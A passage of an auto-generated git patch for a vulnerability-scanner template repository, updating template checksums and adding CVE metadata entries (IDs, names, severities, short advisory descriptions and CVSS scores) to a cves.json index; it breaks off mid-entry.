http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml:a7d9ae584eaea898633aab6cfb98fbc30cc3e770 http/vulnerabilities/wordpress/new-user-approve-xss.yaml:c131ac7a92a8eeba645524f1c0bc945af02561aa http/vulnerabilities/wordpress/newsletter-open-redirect.yaml:2844e738d46a2ea7fd11f3f3d030991fff76ba9f +http/vulnerabilities/wordpress/notificationx-sqli.yaml:1fdbe2ea9d7bdd7082e5624a31b02556d78c96de http/vulnerabilities/wordpress/pieregister-open-redirect.yaml:01a32babb23c128ff14bafffe515cce41b76f108 http/vulnerabilities/wordpress/sassy-social-share.yaml:598f684a8766a13380351442dbf6f704fb17a6f8 http/vulnerabilities/wordpress/seatreg-redirect.yaml:2353a54f05ef04c1073e5e3476d03a11040efd79 @@ -6400,13 +6439,14 @@ http/vulnerabilities/wordpress/wpml-xss.yaml:be8ebc66c2f3443f72bbbfae75b68b450ea http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml:6cbcd6ec4668c5ed28b25aad4804fb9e91d06b1d http/vulnerabilities/wordpress/wptouch-open-redirect.yaml:7759b533a9f9217e3b5933fa13428641e9367454 http/vulnerabilities/wordpress/wptouch-xss.yaml:3cdc7148ce1133d068a6956fdfc8ff31a4b6abc7 +http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml:05029365c2846b71780931d4cdc6c84ce1ad0151 http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:dacdfb742a867f98ded6eb9c66587c7f92714abc http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:41aef3c39f8704f708b0ff7d2b952facc6b214fd http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:1ac1379d6f765a6008821b965709d63455f1dc81 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:5cdad439b1340a471900588ca779c1985c865298 http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab -http/vulnerabilities /other/sitemap-sql-injection.yaml:11b617b3aeea8af260685df2185c12887fb9e357 +http/vulnerabilities /other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 network/backdoor/backdoored-zte.yaml:3aa481fd5f1c0e8e9853646a7fbca35d927911fa network/cisco-smi-exposure.yaml:89fcf6f71dff1403e1845205656ae049948574aa @@ -6532,7 +6572,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:796791728880030cc597ee7b25223a9b7c67f138 +templates-checksum.txt:ce0e3017b26e281acdb8eeb928692fbb6fef3d4a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 25270ac6858c0c915b70c30412f3e216dd4a6f93 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:16:37 +0000 Subject: [PATCH 497/609] Auto Generated cves.json [Fri Jul 7 11:16:37 UTC 2023] :robot: --- cves.json | 36 ++++++++++++++++++++++++++++++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 37 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 2423822318..758069cf20 100644 --- a/cves.json +++ b/cves.json @@ -193,6 +193,7 @@ {"ID":"CVE-2012-4889","Info":{"Name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4889.yaml"} {"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} {"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"} +{"ID":"CVE-2012-5321","Info":{"Name":"TikiWiki CMS Groupware v8.3 - Open Redirect","Severity":"medium","Description":"tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka \"frame injection\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-5321.yaml"} {"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"} {"ID":"CVE-2012-6499","Info":{"Name":"WordPress Plugin Age Verification v0.4 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-6499.yaml"} {"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"} @@ -631,6 +632,7 @@ {"ID":"CVE-2019-14470","Info":{"Name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","Severity":"medium","Description":"WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14470.yaml"} {"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c5.0.2 - Local File Inclusion","Severity":"high","Description":"OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-14530.yaml"} {"ID":"CVE-2019-14696","Info":{"Name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","Severity":"medium","Description":"Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14696.yaml"} +{"ID":"CVE-2019-14789","Info":{"Name":"Custom 404 Pro \u003c 3.2.8 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14789.yaml"} {"ID":"CVE-2019-14974","Info":{"Name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-14974.yaml"} {"ID":"CVE-2019-15043","Info":{"Name":"Grafana - Improper Access Control","Severity":"high","Description":"Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-15043.yaml"} {"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15107.yaml"} @@ -718,6 +720,7 @@ {"ID":"CVE-2019-7543","Info":{"Name":"KindEditor 4.1.11 - Cross-Site Scripting","Severity":"medium","Description":"KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7543.yaml"} {"ID":"CVE-2019-7609","Info":{"Name":"Kibana Timelion - Arbitrary Code Execution","Severity":"critical","Description":"Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-7609.yaml"} {"ID":"CVE-2019-8086","Info":{"Name":"Adobe Experience Manager - XML External Entity Injection","Severity":"high","Description":"Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-8086.yaml"} +{"ID":"CVE-2019-8390","Info":{"Name":"qdPM 9.1 - Cross-site Scripting","Severity":"medium","Description":"qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-8390.yaml"} {"ID":"CVE-2019-8442","Info":{"Name":"Jira - Local File Inclusion","Severity":"high","Description":"Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-8442.yaml"} {"ID":"CVE-2019-8446","Info":{"Name":"Jira Improper Authorization","Severity":"medium","Description":"The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-8446.yaml"} {"ID":"CVE-2019-8449","Info":{"Name":"Jira \u003c8.4.0 - Information Disclosure","Severity":"medium","Description":"Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-8449.yaml"} @@ -818,6 +821,7 @@ {"ID":"CVE-2020-19295","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-19295.yaml"} {"ID":"CVE-2020-19360","Info":{"Name":"FHEM 6.0 - Local File Inclusion","Severity":"high","Description":"FHEM version 6.0 suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-19360.yaml"} {"ID":"CVE-2020-1943","Info":{"Name":"Apache OFBiz \u003c=16.11.07 - Cross-Site Scripting","Severity":"medium","Description":"Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-1943.yaml"} +{"ID":"CVE-2020-19515","Info":{"Name":"qdPM 9.1 - Cross-site Scripting","Severity":"medium","Description":"qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\\install\\modules\\database_config.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-19515.yaml"} {"ID":"CVE-2020-1956","Info":{"Name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","Severity":"high","Description":"Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-1956.yaml"} {"ID":"CVE-2020-19625","Info":{"Name":"Gridx 1.3 - Remote Code Execution","Severity":"critical","Description":"Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-19625.yaml"} {"ID":"CVE-2020-20285","Info":{"Name":"ZZcms - Cross-Site Scripting","Severity":"medium","Description":"ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-20285.yaml"} @@ -911,6 +915,10 @@ {"ID":"CVE-2020-35847","Info":{"Name":"Agentejo Cockpit \u003c0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35847.yaml"} {"ID":"CVE-2020-35848","Info":{"Name":"Agentejo Cockpit \u003c0.12.0 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35848.yaml"} {"ID":"CVE-2020-35951","Info":{"Name":"Wordpress Quiz and Survey Master \u003c7.0.1 - Arbitrary File Deletion","Severity":"critical","Description":"Wordpress Quiz and Survey Master \u003c7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2020/CVE-2020-35951.yaml"} +{"ID":"CVE-2020-35984","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35984.yaml"} +{"ID":"CVE-2020-35985","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Global Lists\" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35985.yaml"} +{"ID":"CVE-2020-35986","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35986.yaml"} +{"ID":"CVE-2020-35987","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35987.yaml"} {"ID":"CVE-2020-36112","Info":{"Name":"CSE Bookstore 1.0 - SQL Injection","Severity":"critical","Description":"CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-36112.yaml"} {"ID":"CVE-2020-36289","Info":{"Name":"Jira Server and Data Center - Information Disclosure","Severity":"medium","Description":"Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-36289.yaml"} {"ID":"CVE-2020-36365","Info":{"Name":"Smartstore \u003c4.1.0 - Open Redirect","Severity":"medium","Description":"Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-36365.yaml"} @@ -1744,6 +1752,7 @@ {"ID":"CVE-2022-42747","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42747.yaml"} {"ID":"CVE-2022-42748","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42748.yaml"} {"ID":"CVE-2022-42749","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42749.yaml"} +{"ID":"CVE-2022-4295","Info":{"Name":"Show all comments \u003c 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4295.yaml"} {"ID":"CVE-2022-4301","Info":{"Name":"WordPress Sunshine Photo Cart \u003c2.9.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4301.yaml"} {"ID":"CVE-2022-43014","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43014.yaml"} {"ID":"CVE-2022-43015","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43015.yaml"} @@ -1752,6 +1761,13 @@ {"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43018.yaml"} {"ID":"CVE-2022-4306","Info":{"Name":"WordPress Panda Pods Repeater Field \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-4306.yaml"} {"ID":"CVE-2022-43140","Info":{"Name":"kkFileView 4.1.0 - Server-Side Request Forgery","Severity":"high","Description":"kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-43140.yaml"} +{"ID":"CVE-2022-43164","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43164.yaml"} +{"ID":"CVE-2022-43165","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking \"Create\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43165.yaml"} +{"ID":"CVE-2022-43166","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Entity\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43166.yaml"} +{"ID":"CVE-2022-43167","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43167.yaml"} +{"ID":"CVE-2022-43169","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Group\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43169.yaml"} +{"ID":"CVE-2022-43170","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add info block\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43170.yaml"} +{"ID":"CVE-2022-43185","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43185.yaml"} {"ID":"CVE-2022-4320","Info":{"Name":"WordPress Events Calendar \u003c1.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4320.yaml"} {"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"} {"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4325.yaml"} @@ -1759,6 +1775,14 @@ {"ID":"CVE-2022-43769","Info":{"Name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","Severity":"high","Description":"Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-43769.yaml"} {"ID":"CVE-2022-4447","Info":{"Name":"WordPress Fontsy \u003c=1.8.6 - SQL Injection","Severity":"critical","Description":"WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4447.yaml"} {"ID":"CVE-2022-44877","Info":{"Name":"CentOS Web Panel 7 \u003c0.9.8.1147 - Remote Code Execution","Severity":"critical","Description":"CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44877.yaml"} +{"ID":"CVE-2022-44944","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the 